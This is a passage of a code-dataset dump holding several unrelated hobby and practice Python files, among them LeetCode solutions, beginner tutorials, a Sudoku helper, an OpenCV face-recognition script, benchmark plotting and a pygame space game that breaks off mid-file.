true\n\nExample 2:\nInput: s = \"rat\", t = \"car\"\nOutput: false\n\nConstraints:\n 1 <= s.length, t.length <= 5 * 104\n s and t consist of lowercase English letters.\n\nFollow up: What if the inputs contain Unicode characters? How would you adapt your solution to such a case?\"\"\"\n\n\nclass Solution242:\n def isAnagram(self, s: str, t: str) -> bool:\n if len(s) != len(t):\n return False\n\n hashmap_s = {}\n hashmap_t = {}\n for i in range(len(s)):\n hashmap_s[s[i]] = 1 + hashmap_s.get(s[i], 0)\n hashmap_t[t[i]] = 1 + hashmap_t.get(t[i], 0)\n\n for char in hashmap_s:\n if hashmap_s[char] != hashmap_t.get(char, 0):\n return False\n\n return True\n # Alternative solution using sorted()\n # return sorted(s) == sorted(t)\n\n\nsolution = Solution242()\nprint(solution.isAnagram(s=\"anagram\", t=\"nagaram\"))\nprint(solution.isAnagram(s=\"rat\", t=\"car\"))\n","repo_name":"Erik-Simonian/Leetcode","sub_path":"Arrays and Hashing/Problem 242 Valid Anagram.py","file_name":"Problem 242 Valid Anagram.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17514787163","text":"# money = 'Ture'\n# if money:\n# print(\"hello\")\n\nmoney = 2000\nif money >= 3000:\n print(\"이상이다\")\nelse:\n print(\"이하다\")\n\n# or\nmoney_cho = 3000\ncard = 'Ture'\nif money_cho >=4500 or card:\n print(\"지불가능\")\nelse:\n print(\"불가능\")\n\n#and\nmoney_cho = 3000\ncard = 'Ture'\nif money_cho >=4500 and card:\n print(\"지불가능\")\nelse:\n print(\"불가능\")\n\n#not\nmoney_cho = 3000\ncard = 'Ture'\nif not True:\n print(\"지불가능\")\nelse:\n print(\"불가능\")\n\n# in, not in\n# tuple을 이용한다\n\n#list\nls = [1,2,3]\nls1 = 1 in [1,2,3]\nprint(ls1)\n\nls1 = 1 not in [1,2,3]\nprint(ls1)\n\n#tuple\n\nrastech = ('cho', 'pak', 'jeon', 'che')\nmenver = 'cho' in rastech\nprint(menver)\n\n# if문이랑 합친거\nwishlist = ['girlfirend', 'joden', 'money', 'car']\nif 'girlfirend' in wishlist:\n print(\"여자친구있음\")\nelse:\n print(\"없스어영요\")\n\n\n# if elif 문\n\nwishlist = ['girlfirend', 'joden', 'money', 'car']\nif 'boyfirend' in wishlist:\n print(\"있음\")\nelse:\n if 'girlfirend' in wishlist:\n print(\"여친있음\")\n else:\n print(\"없음\")\n\n# if문 한줄로 줄이기\npocket = ['paper', 'money', 'cellphone']\nif 'money' in pocket: pass\nelse:\n print(\"카드를 꺼내라\")\n \n\n\n\n","repo_name":"CHOMINCHODAN/python_grammar","sub_path":"if.py","file_name":"if.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25347741626","text":"import pygame as pg\nfrom Sudoku.Helper import board, av_nums, pos_nums, WIDTH, HEIGHT, COLS, ROWS, BLUE, BLACK, WHITE, font_num, LIGHT_BLUE, \\\n footnote_board, LIGHT_GRAY, font_footnote, font_mini_num, static_board, GRAY\n\n\ndef used_nums(cox, coy):\n # Will check which numbers can be inserted on the given coordinates, and update the av_nums in constants.\n av_nums.clear()\n used_nums = []\n # Checks the horizontal line\n for num in board[coy]:\n if num < 10:\n used_nums.append(num)\n # Checks the vertical line\n for yrow in board:\n if yrow[cox] < 10:\n used_nums.append(yrow[cox])\n # Checks the box\n ybox = coy // 3\n xbox = cox // 3\n for ynum in range(3):\n for xnum in range(3):\n if board[ybox * 3 + ynum][xbox * 3 + xnum] < 10:\n used_nums.append(board[ybox * 3 + ynum][xbox * 3 + xnum])\n # updating av_nums in constants.\n for num in pos_nums:\n if num not in used_nums:\n av_nums.append(num)\n\n\ndef check_win():\n for yrow in board:\n for x in yrow:\n if x == 10 or x == 11:\n return False\n else: return True\n\n\ndef drawboard(window):\n for numy, yrow in enumerate(board):\n for numx, x in enumerate(yrow):\n if x == 10:\n pass\n elif x == 11:\n pg.draw.circle(window, BLUE, (int(numx * (WIDTH // ROWS) + WIDTH // ROWS * 0.5 + 2),\n int(numy * (HEIGHT // COLS) + HEIGHT // COLS * 0.5 + 2)),\n int(WIDTH // ROWS * 0.5 - 5))\n pg.draw.circle(window, WHITE, (int(numx * (WIDTH // ROWS) + WIDTH // ROWS * 0.5 + 2),\n int(numy * (HEIGHT // COLS) + HEIGHT // COLS * 0.5 + 2)),\n int(WIDTH // ROWS * 0.5 - 8))\n elif x == 12:\n pg.draw.circle(window, LIGHT_BLUE, (int(numx * (WIDTH // ROWS) + WIDTH // ROWS * 0.5 + 2),\n int(numy * (HEIGHT // COLS) + HEIGHT // COLS * 0.5 + 2)),\n int(WIDTH // ROWS * 0.5 - 5))\n pg.draw.circle(window, WHITE, (int(numx * (WIDTH // ROWS) + WIDTH // ROWS * 0.5 + 2),\n int(numy * (HEIGHT // COLS) + HEIGHT // COLS * 0.5 + 2)),\n int(WIDTH // ROWS * 0.5 - 8))\n else:\n if static_board[numy][numx] == 1:\n color = BLACK\n else:\n color = GRAY\n text = font_num.render(str(x), False, color)\n window.blit(text, (numx * (WIDTH / ROWS) + (WIDTH / ROWS * 0.3),\n numy * (HEIGHT / COLS) + (HEIGHT / COLS * 0.15)))\n for numy, yrow in enumerate(footnote_board):\n for numx, x in enumerate(yrow):\n if len(x) == 0:\n pass\n elif len(x) > 0 and board[numy][numx] > 9:\n for co_num, num in enumerate(x):\n text = font_footnote.render(str(num), False, LIGHT_GRAY)\n window.blit(text, (numx * (WIDTH / ROWS) + (WIDTH / ROWS * 0.09) + (co_num % 3) * 25,\n numy * (HEIGHT / COLS) + (HEIGHT / COLS * 0.07) + ((co_num // 3) * 25)))\n\n\ndef drawgrid(window):\n for y in range(1, WIDTH // ROWS):\n if y % 3 == 0:\n width = 4\n else:\n width = 2\n rect = pg.rect.Rect((y * WIDTH // ROWS, 0), (width, HEIGHT))\n pg.draw.rect(window, BLACK, rect)\n for x in range(HEIGHT // COLS):\n if x % 3 == 0 and x != 0:\n width = 4\n else:\n width = 2\n rect = pg.rect.Rect((0, x * HEIGHT // COLS), (HEIGHT, width))\n pg.draw.rect(window, BLACK, rect)\n\n\ndef draw_mini_board(window, mini_board, cox, coy):\n for num in range(10):\n if num % 3 == 0:color = BLACK\n else: color = LIGHT_GRAY\n pg.draw.rect(window, color, (coy + 18 * num, cox, 1, 162))\n pg.draw.rect(window, color, (coy, cox + 18 * num, 162, 1))\n\n for numy, yrow in enumerate(mini_board):\n for numx, x in enumerate(yrow):\n if x == 10:\n pass\n else:\n text = font_mini_num.render(str(x), False, BLACK)\n window.blit(text, ((numx * 18 + coy + 5), (numy * 18 + cox + 4)))\n\n\ndef move_selected(cox, coy, seletected_num):\n for numy, yrow in enumerate(board):\n for numx, x in enumerate(yrow):\n if x == seletected_num:\n if 0 <= (numy + coy) < 9 and 0 <= (numx + cox) < 9 and board[numy + coy][numx + cox] == 10:\n board[numy][numx] = 10\n board[numy + coy][numx + cox] = seletected_num\n used_nums(numx + cox, numy + coy)\n print(av_nums)\n return None\n","repo_name":"JustJust03/Sudoku-Solver","sub_path":"Helper/Engine.py","file_name":"Engine.py","file_ext":"py","file_size_in_byte":4929,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"32678919722","text":"#hello \n#today we are going to make KNN clasification algo\n# in IRIS dataset\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.neighbors import KNeighborsClassifier\nimport numpy as np \nfrom sklearn.model_selection import train_test_split\n\niris_dataset = load_iris()\n\nX_train, X_test, Y_train, Y_test = train_test_split(iris_dataset[\"data\"],\niris_dataset[\"target\"],random_state=0)\n\nkn = KNeighborsClassifier(n_neighbors=1)\nkn.fit(X_train,Y_train)\n\nx_new = np.array([[5,2.7,1,0-8]])\n#prediction method now ->\n\nprediction = kn.predict(x_new)\n\nprint(\"Predict target Value -> {}\\n\".format(prediction))\nprint(\"Predict Feature Name -> {}\\n\".format(iris_dataset[\"target_names\"][prediction]))\nprint(\"Score -> {:.2f}\".format(kn.score(X_test,Y_test)))","repo_name":"dharmanshusoni/Python-ML","sub_path":"kmean.py","file_name":"kmean.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"7957531850","text":"from typing import List\n\n\nclass Solution:\n def calPoints(self, ops: List[str]) -> int:\n scores_stack = []\n\n operators = {\n '+': lambda stk: stk.append(stk[-2] + stk[-1]),\n 'D': lambda stk: stk.append(stk[-1] * 2),\n 'C': lambda stk: stk.pop(),\n }\n\n for element in ops:\n if element in operators:\n operators[element](scores_stack)\n continue\n scores_stack.append(int(element))\n return sum(scores_stack)\n","repo_name":"aBulgakoff/algos","sub_path":"leetcode/stack/682_baseball_game.py","file_name":"682_baseball_game.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1897107113","text":"# 1006. 笨阶乘\n# 通常,正整数 n1 的阶乘是所有小于或等于 n1 的正整数的乘积。例如,factorial(10) = 10 * 9 * 8 * 7 * 6 * 5 * 4 * 3 * 2 * 1。\n# 相反,我们设计了一个笨阶乘 clumsy:在整数的递减序列中,我们以一个固定顺序的操作符序列来依次替换原有的乘法操作符:乘法(*),除法(/),加法(+)和减法(-)。\n# 例如,clumsy(10) = 10 * 9 / 8 + 7 - 6 * 5 / 4 + 3 - 2 * 1。然而,这些运算仍然使用通常的算术运算顺序:\n# 我们在任何加、减步骤之前执行所有的乘法和除法步骤,并且按从左到右处理乘法和除法步骤。\n# 另外,我们使用的除法是地板除法(floor division),所以 10 * 9 / 8 等于 11。这保证结果是一个整数。\n# 实现上面定义的笨函数:给定一个整数 N,它返回 N 的笨阶乘。\ndef clumsy(N: int):\n operator = ['*', '/', '+', '-']\n operatorCounter = 0\n numStack = [N]\n numCounter = N - 1\n firstSet = True\n\n def operate(currentOperator):\n if currentOperator == '*':\n operateLatterNum = numStack.pop(-1)\n numStack.append(operateLatterNum * numStack.pop(-1))\n elif currentOperator == '/':\n operateLatterNum = numStack.pop(-1)\n numStack.append(int(numStack.pop(-1) / operateLatterNum))\n elif currentOperator == '+':\n if firstSet:\n operateLatterNum = numStack.pop(-1)\n numStack.append(numStack.pop(-1) + operateLatterNum)\n else:\n operateLatterNum = numStack.pop(-1)\n numStack.append(numStack.pop(-1) - operateLatterNum)\n else:\n operateLatterNum = numStack.pop(-1)\n numStack.append(numStack.pop(-1) - operateLatterNum)\n\n while numCounter > 0:\n currentOperator = operator[operatorCounter % 4]\n operatorCounter += 1\n numStack.append(numCounter)\n numCounter -= 1\n if currentOperator != '-':\n operate(currentOperator)\n else:\n firstSet = False\n for i in range(len(numStack)):\n if i != 0:\n numStack[i] = -numStack[i]\n return sum(numStack)\n\n\nclumsy(4)\n\n\ndef clumsyVersion2(N: int):\n firstSet = True\n setNumber = N >> 2\n remainder = N % 4\n finalSetIfFirstSet = [0, 1, 2 * 1, int(3 * 2 / 1)]\n finalSetIfNotFirstSet = [0, - 1, - 2 * 1, -int(3 * 2 / 1)]\n result = []\n for i in range(setNumber):\n if firstSet:\n firstSet = False\n result.append(int(N * (N - 1) / (N - 2)) + N - 3)\n else:\n result.append(-int(N * (N - 1) / (N - 2)) + N - 3)\n N -= 4\n if firstSet:\n result.append(finalSetIfFirstSet[remainder])\n else:\n result.append(finalSetIfNotFirstSet[remainder])\n return sum(result)\n\n\nclumsyVersion2(10)\n","repo_name":"Zombiesama18/Leetcode_Python","sub_path":"Leetcode/1006. 笨阶乘.py","file_name":"1006. 笨阶乘.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14803186464","text":"\"\"\" \n Write a program that calculates the area of a rectangle S=a*b, the area of a\n triangle S=0.5*h*a, the area of a circle S=pi*r**2. This module must be used in\n another module in which we ask the user the area of which figure he wants to\n calculate.\n (To perform the task, you need to import the math module, and from it the\n pow() function and the value of the variable pi, and module, which contains\n three functions for finding areas, into the main program. The basic logic of the\n program is executed in the main module).\n\"\"\"\nfrom task3_helper import rectangle_area, triangle_area, circle_area\n\ndef main():\n print(\"1. Rectangle\")\n print(\"2. Triangle\")\n print(\"3. Circle\")\n choice = input(\"Enter your choice: \").strip()\n if choice == '1':\n a = float(input(\"Enter a: \"))\n b = float(input(\"Enter b: \"))\n print(f\"Area of rectangle: {rectangle_area(a, b):.2f}\")\n elif choice == '2':\n base = float(input(\"Enter base: \"))\n height = float(input(\"Enter height: \"))\n print(f\"Area of triangle: {triangle_area(base, height):.2f}\")\n elif choice == '3':\n radius = float(input(\"Enter radius: \"))\n print(f\"Area of circle: {circle_area(radius):.2f}\")\n else:\n print(\"Invalid choice\")\n \nif __name__ == \"__main__\":\n main()","repo_name":"kolyasalubov/Lv-UA-1020.PythonFundamentals","sub_path":"AndyDorokhin/HW8/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"20818480945","text":"import pytest\nimport yaml\n\nfrom python_code.calc import Calculator\n\nwith open(\"./datas/calc.yaml\", encoding='utf-8') as f:\n datas = yaml.safe_load(f)\n datas_add = datas['add']\n add_datas = datas_add['datas']\n print(add_datas)\n add_myid = datas_add['myid']\n print(add_myid)\n\n # datas = yaml.safe_load(f)\n datas_div = datas['div']\n div_datas = datas_div['datas']\n print(div_datas)\n div_myid = datas_div['myid']\n print(div_myid)\n\n\n# def test_a():\n# print(\"a\")\n\n\n# def func():\nclass TestCalc:\n def setup_class(self):\n print(\"开始计算\")\n # 实例化计算器类\n self.calc = Calculator()\n\n def teardown_class(self):\n print(\"计算结束\")\n\n @pytest.mark.parametrize(\n \"a, b, expect\",\n add_datas, ids=add_myid\n\n )\n def test_add(self, a, b, expect):\n # 实例化计算器的类\n # calc = Calculator()\n # 调用 add 方法\n result = self.calc.add(a, b)\n # 判断result 是浮点数,保留2位小数\n if isinstance(result, float):\n result = round(result, 2)\n # 断言\n assert result == expect\n\n @pytest.mark.parametrize(\n \"a, b, expect\",\n div_datas, ids=div_myid\n )\n def test_div(self, a, b, expect):\n result = self.calc.div(a, b)\n if isinstance(result, float):\n result = round(result, 2)\n\n assert result == expect\n\n # def test_add2(self):\n # result = self.calc.add(0.1, 0.2)\n # assert round(result, 2) == 0.3\n\n # def test_add1(self):\n # #实例化计算器的类\n # # calc = Calculator()\n # #调用 add 方法\n # result = self.calc.add(0.1, 0.1)\n # #断言\n # assert result == 0.2\n #\n # def test_add2(self):\n # #实例化计算器的类\n # # calc = Calculator()\n # #调用 add 方法\n # result = self.calc.add(-1, -1)\n # #断言\n # assert result == -2\n\n\n","repo_name":"cjz924813688/HogwartsFI03","sub_path":"testing/test_calc.py","file_name":"test_calc.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33979809061","text":"from cv2 import cv2\nimport os,urllib.request\nimport numpy as np\nfrom django.conf import settings\nfrom django.http.response import StreamingHttpResponse\nfrom django.contrib import messages\n# import dlib\nimport sys\n\nsize = 4\nprint(\"WEart1\")\nhaar_file = 'static/haarcascade_frontalface_default.xml'\nprint(\"WEart4\")\ndatasets = 'static/datasets'\n\ncamera = cv2.VideoCapture(0)\n\ndef face_recognize():\n print('Recognizing Face Please Be in sufficient Lights...')\n # Create a list of images and a list of corresponding names\n (images, lables, names, id) = ([], [], {}, 0)\n for (subdirs, dirs, files) in os.walk(datasets):\n for subdir in dirs:\n names[id] = subdir\n subjectpath = os.path.join(datasets, subdir)\n for filename in os.listdir(subjectpath):\n path = subjectpath + '/' + filename\n lable = id\n images.append(cv2.imread(path, 0))\n lables.append(int(lable))\n id += 1\n (width, height) = (130, 100)\n # Create a Numpy array from the two lists above\n (images, lables) = [np.array(lis) for lis in [images, lables]]\n # OpenCV trains a model from the images\n # NOTE FOR OpenCV2: remove '.face'\n model = cv2.face.LBPHFaceRecognizer_create()\n model.train(images, lables)\n # Part 2: Use fisherRecognizer on camera stream\n face_cascade = cv2.CascadeClassifier(haar_file)\n \n while True:\n print(\"WEart\")\n success,frame=camera.read()\n print(\"WEart2\")\n if not success:\n print(\"WEart3\")\n break\n else:\n # Part 1: Create fisherRecognizer \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2) \n face = gray[y:y + h, x:x + w] \n face_resize = cv2.resize(face, (width, height)) \n # Try to recognize the face\n prediction = model.predict(face_resize) \n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)\n \n if prediction[1]<500:\n cv2.putText(frame, '% s - %.0f' %(names[prediction[0]], prediction[1]), (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0))\n else:\n cv2.putText(frame, 'not recognized',cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2))\n face = gray[y:y + h, x:x + w]\n face_resize = cv2.resize(face, (width, height))\n # Try to recognize the face\n prediction = model.predict(face_resize)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)\n \n if prediction[1]<500:\n (x-10, y-10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0)\n cv2.imshow('OpenCV', frame)\n key = cv2.waitKey(10)\n if key == 27:\n break\n\n\n\n","repo_name":"Pritam-Sh/WebApp","sub_path":"felony/nextcamera.py","file_name":"nextcamera.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32791983070","text":"from ...util import central_data_store\nfrom ...util import settings\nfrom ...util import number_output\nfrom . import storage\n\n# External\nimport datetime\nimport numpy as np\n\n\n# 1. Global vars ===============================================================\n\n\n# 1.1 Classes ------------------------------------------------------------------\nclass BaseStorage(object): # class to be extended for each node\n\n def __init__(self):\n self.__storages = []\n self.__log_storages = None\n self.__sw_storages = None # string de-duplicator for storage overview output\n self.__array_storages = []\n\n\n def load_storages(self, storages):\n for item in storages:\n obj = storage.Storage.loadFromFileData(item)\n self.add_storage(obj)\n\n\n def add_storage(self, storage):\n self.__storages.append(storage)\n\n\n def register_storages(self, prefix,\n cds: central_data_store.CentralDataStore,\n cfg: settings.Config):\n \"\"\"\n Registers all the storages with the data tree & sets up local output.\n\n prefix - prefix of the output filename & -path for logging storage data\n \"\"\"\n\n # register\n for store in self.__storages:\n store.register(self)\n\n # output\n self.__log_storages = cfg.get_log_storages\n if (len(self.__storages) > 0 and self.__log_storages()):\n header = []\n self.__array_storages = [None] * len(self.__storages)\n for store in self.__storages:\n header.append(store.get_node_name())\n self.__sw_storages = number_output.NumberOutput(\n prefix + '_storages.csv', len(self.__storages), header,\n cfg.log_storages, cds.get_single_file_storages(),\n self.get_full_node_id())\n\n\n def update_storage_values(self, current_tp: datetime.datetime):\n for store in self.__storages:\n store.update(current_tp)\n\n\n def log_storages(self, current_time: datetime.datetime,\n last_time: datetime.datetime):\n if (len(self.__storages) > 0 and self.__log_storages()):\n\n for i, store in enumerate(self.__storages):\n self.__array_storages[i] = store.get_volume()\n\n self.__sw_storages.write_record(np.array(self.__array_storages),\n current_time, last_time)\n\n\n def close_storages(self, current_time: datetime.datetime):\n if (len(self.__storages) > 0 and self.__log_storages()):\n self.__sw_storages.close(current_time)\n\n\n def error_storage_no_node(self, str_class: str, parts: list):\n print(f'\\nError: {str_class}._get_child_object:')\n print(f'{str_class} object with {parts[0]} does not exist')\n print(f'Search ID: {\".\".join(str(x) for x in parts)}')\n self.print_node_id_list_storage()\n exit(255)\n\n\n def print_node_id_list_storage(self):\n print('\\nAttached storages:')\n for store in self.__storages:\n print(f' {store.get_node_id()}')\n\n\n def _get_ided_storage_object(self, obj_id):\n for store in self.__storages:\n if (store.get_node_id() == obj_id):\n return store\n\n return None\n\n\n def output_overview_storages(self, f, level: int = -1):\n \"\"\"\n Outputs the number of elements within the model\n \"\"\"\n\n if (level < 0):\n print(f'{self.get_node_name()}.output_overview_storages: Level not set')\n exit(255)\n\n f.write(\"\\n\" + \" \" * level + f\"Num Storages: {len(self.__storages)}\")\n\n\n\n\n\n\n\n# 2. Functions =================================================================\n\n\n# 3. Main Exec =================================================================\n","repo_name":"nclwater/HUUM_model","sub_path":"src/huum_model/translators/storage/base_storage.py","file_name":"base_storage.py","file_ext":"py","file_size_in_byte":3834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"11229763436","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport csv\nfrom datetime import datetime\n\n\ndef parse_csv(path):\n \"\"\"Read in the way that dict[algorithm][world_size] --> list\"\"\"\n results = dict()\n with open(path) as csvfile:\n iterator = csv.reader(csvfile, delimiter=',')\n for row in iterator:\n print(row)\n algorithm, world_size, object_size, mean, std = row[0].split('_')[-1], int(row[1]), int(row[2]), float(row[3]), float(row[4])\n if algorithm not in results:\n results[algorithm] = {}\n if world_size not in results[algorithm]:\n results[algorithm][world_size] = []\n results[algorithm][world_size].append([object_size, mean, std])\n return results\n\ndef read_data(setting, backend):\n if setting == 'multigpu':\n assert backend == 'gpu'\n ray_path = 'multigpu/ray-microbenchmark-gpu.csv'\n pytorch_path = 'multigpu/pytorch-microbenchmark-nccl.csv'\n else:\n if backend == 'cpu':\n ray_path = 'distributed/ray-microbenchmark-cpu.csv'\n pytorch_path = 'distributed/pytorch-microbenchmark-gloo.csv'\n else:\n ray_path = 'distributed/ray-microbenchmark-gpu.csv'\n pytorch_path = 'distributed/pytorch-microbenchmark-nccl.csv'\n ray_data = parse_csv(ray_path)\n pytorch_data = parse_csv(pytorch_path)\n return ray_data, pytorch_data\n\n\n\n\ndef draw(ray, other, fig_name):\n fig, ax = plt.subplots(figsize=(4.5, 2.5))\n width = 0.1 # the width of the bars\n margin = width * 3 + 0.1\n start = 0.1\n ind = np.array([start + m * margin for m in range(ray.shape[0])])\n\n labelfont = {\n 'color': 'black',\n 'weight': 'normal',\n 'size': 12}\n\n colors = ['darkorange', 'c', 'lightgreen', 'lightskyblue']\n hatches = ['/', '\\\\', '+', 'x', '+',]\n rects = []\n\n data = np.stack((ray[:,1], other[:,1]))\n for i in range(2):\n m = ax.bar(ind + width * i, np.log10(data[i] * 1e6), width, color=colors[i], edgecolor='black', hatch=hatches[i])\n rects.append(m)\n\n # ax.set_xlim(xmin=0.0, xmax=2)\n xs = ind + width / 2\n ax.set_xticks(xs)\n ax.set_xticklabels(('1KB', '32KB', '1MB', '32MB', '1GB'), fontdict = labelfont)\n ax.set_ylabel('Latency (micro sec)', fontdict = labelfont)\n ax.set_ylim(ymax=7, ymin=1)\n ax.set_yticks([1, 2, 3, 4, 5, 6])\n ax.set_yticklabels(['$10^1$', '$10^2$', '$10^3$', '$10^4$', '$10^5$', '$10^6$'])\n if 'cpu' in fig_name:\n other_name = 'gloo'\n else:\n other_name = 'nccl'\n ax.legend((rects[0][0], rects[1][0]), ('ray', other_name), loc='upper left', ncol=1, prop={'size':12})\n # set the grid lines to dotted\n ax.grid(True)\n gridlines = ax.get_ygridlines() + ax.get_xgridlines()\n for line in gridlines:\n line.set_linestyle('-.')\n\n # # add the imporvement\n # improvement1 = round(min(data[0][0], data[1][0]) / data[2][0], 2)\n # ax.text(0.26, data[2][0] + 0.005, str(improvement1) + 'x', size=10, weight='bold')\n #\n # # improvement1 = round(max(data[0][0], data[1][0]) / data[3][0], 2)\n # ax.text(0.36, data[3][0] + 0.005, '1.2x', size=10, weight='bold')\n #\n # improvement2 = round(min(data[0][1], data[1][1]) / data[2][1], 2)\n # ax.text(0.76, data[2][1] + 0.005, str(improvement2) + 'x', size=10, weight='bold')\n #\n # improvement2 = round(min(data[0][1], data[1][1]) / data[3][1], 2)\n # ax.text(0.86, data[3][1] + 0.005, str(improvement2) + 'x', size=10, weight='bold')\n #\n # # one bar is out ot range\n # ax.text(0.65, 0.38, str(round(data[1][1], 2)), size=10)\n\n\n ax.set_title(fig_name, fontsize=12, weight='bold')\n plt.show()\n #ax.text(rects12[0].get_x()+rects12[0].get_width()/2, rects12[0].get_y()+rects12[0].get_height() + 0.2, 'TF', ha='center', va='bottom', fontsize=9)\n #ax.text(rects12[1].get_x()+rects12[1].get_width()/2, rects12[1].get_y()+rects12[1].get_height() + 0.2, 'TF-P-wf', ha='center', va='bottom', fontsize=9)\n #ax.text(rects12[2].get_x()+rects12[2].get_width()/2, rects12[2].get_y()+rects12[2].get_height() + 0.2, 'TF-P', ha='center', va='bottom', fontsize=9)\n\n #ax.text(rects22[0].get_x()+rects22[0].get_width()/2, rects22[0].get_y()+rects22[0].get_height() + 0.2, 'TF', ha='center', va='bottom', fontsize=9)\n #ax.text(rects22[1].get_x()+rects22[1].get_width()/2, rects22[1].get_y()+rects22[1].get_height() + 0.2, 'TF-P-wf', ha='center', va='bottom', fontsize=9)\n #ax.text(rects22[2].get_x()+rects22[2].get_width()/2, rects22[2].get_y()+rects22[2].get_height() + 0.2, 'TF-P', ha='center', va='bottom', fontsize=9)\n\n #ax.text(rects32[0].get_x()+rects32[0].get_width()/2, rects32[0].get_y()+rects32[0].get_height() + 0.2, 'TF', ha='center', va='bottom', fontsize=9)\n #ax.text(rects32[1].get_x()+rects32[1].get_width()/2, rects32[1].get_y()+rects32[1].get_height() + 0.2, 'TF-P-wf', ha='center', va='bottom', fontsize=9)\n #ax.text(rects32[2].get_x()+rects32[2].get_width()/2, rects32[2].get_y()+rects32[2].get_height() + 0.2, 'TF-P', ha='center', va='bottom', fontsize=9)\n\n #def autolabel(rectss):\n # attach some text labels\n # n = len(rectss)\n # for j in range(len(rectss[0])):\n # height = 0\n # for i in range(n):\n # height = height + rectss[i][j].get_height()\n # ax.text(rectss[0][j].get_x()+rectss[0][j].get_width()/2, height + 0.6, '%0.0f'% height,\n # ha='center', va='bottom', fontsize=8)\n\n # autolabel([rects1, rects12, rects3])\n # autolabel([rects12, rects122, rects32])\n\n plt.tight_layout()\n # plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)\n\n #plt.show()\n save_dir = os.path.join('plots/', fig_name)\n # fig.savefig(save_dir + '.pdf', transparent = True, bbox_inches = 'tight', pad_inches = 0)\n fig.savefig(save_dir + '.png', transparent = True, bbox_inches = 'tight', pad_inches = 0)\n\n\nbackends = ['cpu', 'gpu']\nsettings = ['multigpu', 'distributed']\nfor setting in settings:\n for backend in backends:\n if setting == 'multigpu' and backend == 'cpu':\n continue\n\n ray_data, pytorch_data = read_data(setting, backend)\n\n if backend == 'gpu':\n algorithms = ['reduce', 'broadcast', 'allgather', 'allreduce']\n else:\n algorithms = ['reduce', 'gather', 'broadcast', 'allgather', 'allreduce', 'sendrecv']\n if setting == 'multigpu':\n world_sizes = [2]\n else:\n world_sizes = [2, 4, 8, 16]\n\n for algorithm in algorithms:\n for world_size in world_sizes:\n fig_name = '{}-{}-{}-{}'.format(setting, backend, algorithm, world_size)\n draw(np.array(ray_data[algorithm][world_size]), np.array(pytorch_data[algorithm][world_size]), fig_name)\n\n","repo_name":"zhisbug/ray-scalable-ml-design","sub_path":"pytorch/microbenchmark/primitives/results/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"34"} +{"seq_id":"31612393772","text":"import pygame\r\nimport random\r\nimport math\r\nfrom pygame import mixer\r\npygame.init()\r\n# create the screen\r\nscreen = pygame.display.set_mode((800, 600))\r\n\r\n# title nad logo\r\npygame.display.set_caption('SPACE INVADER')\r\n# logo=pygame.image.load('cbse.png')\r\n# pygame.display.set_icon(logo)\r\n\r\n# player name\r\n#name= input(\"what is ur name\")\r\nname = \"RAGHVENDRA\"\r\nname.upper()\r\nfont1 = pygame.font.Font('freesansbold.ttf', 52)\r\n\r\n# player\r\nplayerimg = pygame.image.load('spaceship.png')\r\nplayerX = 380\r\nplayerX_change = 0\r\nplayerY = 510\r\npygame.display.update()\r\n\r\n\r\n# enemy\r\nenemyimg = []\r\nenemyX_change = []\r\nenemyY_change = []\r\nenemyX = []\r\n\r\nenemyY = []\r\nnum_of_enemies = 7\r\n\r\nfor i in range(num_of_enemies):\r\n enemyimg.append(pygame.image.load(\"monster.png\"))\r\n enemyX_change.append(7)\r\n enemyY_change.append(40)\r\n enemyX.append(random.randint(0, 730))\r\n enemyY.append(random.randint(0, 50))\r\n pygame.display.update()\r\n\r\n# bullet\r\nbulletimg = pygame.image.load(\"bullet1.png\")\r\nbulletX = 0\r\nbulletX_change = 0\r\nbulletY_change = 40\r\nbulletY = 400\r\nbullet_state = \"ready\" # ready- you can't see bullet on screen #fire- bullet moving\r\n\r\n# score\r\nscore_value = 0\r\nfont = pygame.font.Font('freesansbold.ttf', 32)\r\ntextX = 42\r\ntextY = 16\r\n\r\n# game over text\r\n\r\nover_font = pygame.font.Font('freesansbold.ttf', 76)\r\nhigh_font = pygame.font.Font('freesansbold.ttf', 46)\r\n\r\n\r\n# background\r\nbackground = pygame.image.load(\"space.png\")\r\nbck = pygame.image.load(\"start.png\")\r\n# walls\r\nwall = pygame.image.load('bricks.png')\r\n\r\n# background sound\r\nmixer.music.load('background.wav')\r\nmixer.music.play(-1)\r\n\r\n\r\ndef show_name(x, y):\r\n nam_e = font1.render(\"HELLO \" + 